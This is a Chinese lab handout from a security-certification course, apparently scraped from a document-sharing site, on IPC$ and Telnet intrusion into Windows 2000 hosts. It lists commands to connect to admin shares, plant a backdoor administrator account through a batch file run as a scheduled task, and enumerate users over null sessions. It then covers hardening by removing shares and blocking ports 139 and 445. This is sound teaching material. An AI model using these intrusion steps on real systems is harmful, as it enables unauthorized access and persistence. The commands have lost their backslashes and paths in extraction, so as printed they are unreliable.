《信息安全认证实验2》由会员分享,可在线阅读,更多相关《信息安全认证实验2(9页珍藏版)》请在金锄头文库上搜索。
1、信息安全认证培训实验实验二、IPC$和Telnet入侵试验 教学目的与要求: 掌握ipc$的概念,ipc$连接所使用的端口 掌握ipc$链接的方法 了解ipc$连接失败的常见原因 掌握打开目标的IPC$共享以及其他共享的方法 了解ipc$完整入侵步骤祥解 掌握如何防范ipc$入侵 仪器设备及用具: 连网的个人计算机 Windows 2000 系统平台实验二、IPC$和Telnet入侵试验实验准备:本机:开放IPC$共享已知远程主机的IP地址已知远程主机的管理员账号和密码(IPC$空连接除外) 远程主机:开放IPC$共享启动server服务实验二、IPC$和Telnet入侵试验1、建立IPC$连
2、接在命令提示符下键入命令:NET use IPipc$ ”12345” /user:administrator2、映射网络驱动器把远程主机的C盘映射为本地磁盘Q盘net use Q:IPc$实验二、IPC$和Telnet入侵试验3、留后门(1)编写建立后门账号的批处理程序打开记事本编写批处理程序:net user sysdoor 12345 /addnet localgroup administrators sysdoor /add(2) 建立好后通过IPC$把他拷贝到目标主机:xcopy 本地文件路径文件名 远程主机IP远程路径实验二、IPC$和Telnet入侵试验(3)查看远程主机时间 (
3、4)制定执行后门程序的计划任务At IP time commond 5、断开IPC$连接net use IPIPC$ /del 6、建立空连接net use IPipc$ “ /user:“ 7、查看远程主机共享(看不到默认共享)net view IP 8、得到远程主机的用户名列表 nbtstat -A IP 实验二、IPC$和Telnet入侵试验IPC$安全解决方案1、删除默认共享1)察看本地共享资源 运行-cmd-输入net share 2)删除共享(重起后默认共享仍然存在) net share ipc$ /delete net share admin$ /delete net share
4、 c$ /delete net share d$ /delete(如果有e,f,可以继 续删除) 3)停止server服务 实验二、IPC$和Telnet入侵试验2、屏蔽139,445端口 1)139端口可以通过禁止NBT来屏蔽 本地连接TCP/IT属性高级WINS选禁用TCP/IT 上的NETBIOS一项 2)445端口可以通过修改注册表来屏蔽 添加一个键值 Hive: HKEY_LOCAL_MACHINE Key: SystemControlsetServicesNetBTParameters Name: SMBDeviceEnabled Type: REG_DWORD Value: 0 实验二、IPC$和Telnet入侵试验思考:如果不知道远程主机的用户名和口令,我们还能与远程 主机进行连接并对远程主机进行控制吗?实验二、IPC$和Telnet入侵试验
